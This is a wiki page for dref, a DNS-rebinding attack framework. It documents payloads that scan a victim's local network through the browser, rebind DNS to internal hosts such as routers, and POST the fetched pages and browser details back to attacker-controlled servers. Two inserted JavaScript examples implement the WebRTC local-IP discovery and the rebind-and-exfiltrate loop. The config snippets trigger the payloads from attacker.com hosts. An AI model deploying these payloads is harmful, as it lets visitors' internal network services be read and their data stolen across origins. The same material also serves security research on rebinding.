
Payloads

alxk edited this page Sep 5, 2018 · 9 revisions

Web Discover

Description

The web-discover payload fetches the browser's local IP address using WebRTC (ICE host candidates) and, assuming the local network is a /24, derives the subnet from it.

It then uses netmap.js to scan that subnet for live web services on ports 80 and 8080.

When the scan is complete it opens a rebind iFrame for each web service found, configures the DNS records to point at the local service, and fetches the service's index page from inside the rebound frame.

It POSTs the HTML responses back to dref, effectively exfiltrating data across origins.

The payload uses the "slow and safe" rebinding method, so it takes several minutes to run to completion.
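The target-planning steps described above (local IP from an ICE candidate, /24 derivation, host:port list for the scan), as an added example that is not dref's own web-discover.js. Everything except the WebRTC call itself runs under Node so the parsing can be inspected; the candidate lines are constructed, not captured from a browser, and the function names are this example's own. One caveat a practitioner should know: current browsers replace the IP in host candidates with an mDNS name of the form `<uuid>.local`, in which case this technique yields nothing, and the example returns null rather than guessing.

```javascript
// Added example, not dref's web-discover.js: the target-planning steps of the
// payload (local IP from an ICE candidate -> /24 -> host:port list), written so
// everything except the WebRTC call itself runs under Node for inspection.
// The candidate lines below are constructed, not captured from a browser.

function isPrivateIPv4(ip) {
  const [a, b] = ip.split('.').map(Number);
  return a === 10 ||
    (a === 172 && b >= 16 && b <= 31) ||
    (a === 192 && b === 168) ||
    (a === 169 && b === 254);   // link-local, also worth scanning
}

// The connection address is the 5th field of a "candidate:" line (RFC 5245).
// Only private IPv4 *host* candidates count: srflx/relay carry the public IP,
// and current browsers replace host IPs with "<uuid>.local" mDNS names,
// which is exactly the case in which this technique fails.
function extractLocalIPv4(candidateLine) {
  const f = candidateLine.replace(/^a=/, '').trim().split(/\s+/);
  if (f.length < 8 || !f[0].startsWith('candidate:')) return null;
  const typ = f.indexOf('typ');
  if (typ === -1 || f[typ + 1] !== 'host') return null;
  const addr = f[4];
  if (!/^(\d{1,3}\.){3}\d{1,3}$/.test(addr)) return null;   // rejects IPv6 and .local
  return isPrivateIPv4(addr) ? addr : null;
}

function deriveSubnet24(ip) {
  return ip.split('.').slice(0, 3).join('.');
}

// The host:port pairs a netmap.js-style scan would probe (.0 and .255 skipped).
function buildTargets(subnet, ports) {
  const targets = [];
  for (let h = 1; h <= 254; h++) {
    for (const port of ports) targets.push({ host: `${subnet}.${h}`, port });
  }
  return targets;
}

// Pure planning step: the first usable candidate wins; null if none is usable.
function planScan(candidateLines, ports = [80, 8080]) {
  for (const line of candidateLines) {
    const ip = extractLocalIPv4(line);
    if (ip) {
      const subnet = deriveSubnet24(ip);
      return { ip, subnet, targets: buildTargets(subnet, ports) };
    }
  }
  return null;
}

// Browser-only: collect candidates from a throwaway RTCPeerConnection and
// hand them to planScan. Resolves null when gathering ends or times out.
function discoverAndPlan(ports = [80, 8080], timeoutMs = 2000) {
  return new Promise((resolve) => {
    const pc = new RTCPeerConnection({ iceServers: [] });
    const lines = [];
    let settled = false;
    const finish = () => {
      if (settled) return;
      settled = true;
      clearTimeout(timer);
      pc.close();
      resolve(planScan(lines, ports));
    };
    const timer = setTimeout(finish, timeoutMs);
    pc.onicecandidate = (e) => {
      if (e.candidate) lines.push(e.candidate.candidate); else finish();
    };
    pc.createDataChannel('probe');
    pc.createOffer().then((offer) => pc.setLocalDescription(offer)).catch(finish);
  });
}

// Constructed sample: what a 2018-era browser on 192.168.1.23 would report.
const SAMPLE_CANDIDATES = [
  'candidate:2 1 udp 1686052607 203.0.113.5 54321 typ srflx raddr 192.168.1.23 rport 54321 generation 0',
  'candidate:1 1 udp 2122260223 192.168.1.23 54321 typ host generation 0',
];
// What a current browser reports instead: an mDNS name, so planScan returns null.
const MDNS_CANDIDATES = [
  'candidate:1 1 udp 2122260223 3e1d6bb7-1f5a-4d0e-9b6c-4d3c2b1a0f9e.local 54321 typ host generation 0',
];
```

In a page, `discoverAndPlan().then(plan => ...)` feeds the `targets` array to the scanner; under Node, `planScan(SAMPLE_CANDIDATES)` yields 254 hosts times 2 ports (508 targets) on 192.168.1.0/24, while `planScan(MDNS_CANDIDATES)` yields null.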

Source

dref/scripts/src/payloads/web-discover.js

Usage

To configure the payload, edit dref-config.yml:

targets:
  - target: "demo"
    script: "web-discover"

The payload can be triggered by visiting http://demo.attacker.com/.

Sysinfo

Description

This payload does not use DNS rebinding. It simply exfiltrates information about the browser that may be of use to an attacker, such as version information, configuration, etc.

Source

dref/scripts/src/payloads/sysinfo.js

Usage

To configure the payload, edit dref-config.yml:

targets:
  - target: "sysinfo"
    script: "sysinfo"

The payload can be triggered by visiting http://sysinfo.attacker.com/.

Fast Rebind

Description

The Fast Rebind payload showcases the fastRebind configuration key, which enables near-instant DNS rebinding. This sample payload simply rebinds to the target host and port and exfiltrates the supplied path.

fastRebind does not work every time, and its behaviour is inconsistent between browsers and OSs. The attack currently works 50% of the time on Chrome on macOS (other platforms not tested). Improving it to a 100% success rate is on the roadmap.

The advantage of fastRebind is that victims need only stay on the website for a couple of seconds for the full attack to run, instead of the 60 seconds required by the universal, stable DNS rebinding attack.

Note that fastRebind is set to true in the targets configuration below.
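The "rebind, then fetch and exfiltrate the path" step, as an added example that is not dref's own fast-rebind.js. Network access is injected (a `fetchImpl` and a `postBack` callback, both names of this example) so the loop can be exercised offline against constructed responses. It assumes a convention that dref does not necessarily use: the attacker server tags its own responses with a hypothetical `X-Dref-Origin: attacker` header, so the frame can tell "DNS still points at us" from "DNS now points at the target". Two caveats apply regardless of rebinding speed: the request must bypass the HTTP cache, or a cached copy of the attacker's page looks like a hit, and the browser will keep reusing an open TCP connection to the attacker's IP after the DNS answer changes, so the attacker-side server has to close its connections for the flip to take effect.

```javascript
// Added example, not dref's fast-rebind.js: the rebind/exfiltrate loop a
// rebinding frame runs. Network access is injected (fetchImpl / postBack) so
// the logic runs offline. Assumption, not a dref convention: the attacker
// server tags its own responses with a hypothetical X-Dref-Origin: attacker
// header; anything without it came from the rebound (internal) host.

const sleep = (ms) => new Promise((r) => setTimeout(r, ms));

// True once a response came from something other than the attacker server.
function isRebound(resp) {
  return resp.headers.get('x-dref-origin') !== 'attacker';
}

async function rebindAndExfil({ path, fetchImpl, postBack, maxAttempts = 40, delayMs = 250 }) {
  for (let attempt = 1; attempt <= maxAttempts; attempt++) {
    let resp;
    try {
      // no-store: a cached copy of the attacker's page would look like a hit.
      resp = await fetchImpl(path, { cache: 'no-store', credentials: 'omit' });
    } catch (err) {
      // Connection errors are normal while the resolver flips; keep polling.
      await sleep(delayMs);
      continue;
    }
    if (!isRebound(resp)) {
      await sleep(delayMs);
      continue;
    }
    const body = await resp.text();
    await postBack({ path, status: resp.status, body, attempts: attempt });
    return { ok: true, attempts: attempt, status: resp.status, body };
  }
  return { ok: false, attempts: maxAttempts };
}

// Constructed responses standing in for the network (fetch-like shape).
function fakeResponse(status, headers, body) {
  const h = new Map(Object.entries(headers).map(([k, v]) => [k.toLowerCase(), v]));
  return {
    status,
    headers: { get: (k) => h.get(k.toLowerCase()) ?? null },
    text: async () => body,
  };
}

// Script: one answer from the attacker's own server, one connection refused
// while DNS flips, then the internal host's index page on every later call.
function makeFakeFetch() {
  const script = [
    () => fakeResponse(200, { 'X-Dref-Origin': 'attacker' }, '<!-- dref rebind frame -->'),
    () => { throw new Error('ECONNREFUSED'); },
    () => fakeResponse(200, { Server: 'lighttpd' }, '<html><title>Router admin</title></html>'),
  ];
  let i = 0;
  return async () => script[Math.min(i++, script.length - 1)]();
}

async function runDemo() {
  const exfiltrated = [];   // what would be POSTed back to dref
  const result = await rebindAndExfil({
    path: '/index.html',
    fetchImpl: makeFakeFetch(),
    postBack: async (record) => { exfiltrated.push(record); },
    delayMs: 0,
  });
  return { result, exfiltrated };
}
```

`runDemo()` succeeds on the third attempt and records one exfiltrated page; in a real frame `fetchImpl` is the browser's `fetch` with the rebinding hostname as origin, and `postBack` is a `fetch` POST to the dref server.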

Source

dref/scripts/src/payloads/fast-rebind.js

Usage

To configure the payload, edit dref-config.yml:

targets:
  - target: "fast-rebind"
    script: "fast-rebind"
    fastRebind: true
    args:
      host: "192.168.1.1"
      port: 80
      path: "/index.html"

The payload can be triggered by visiting http://fast-rebind.attacker.com/.

Help

If you encounter any issues with the payloads, come and chat on Gitter.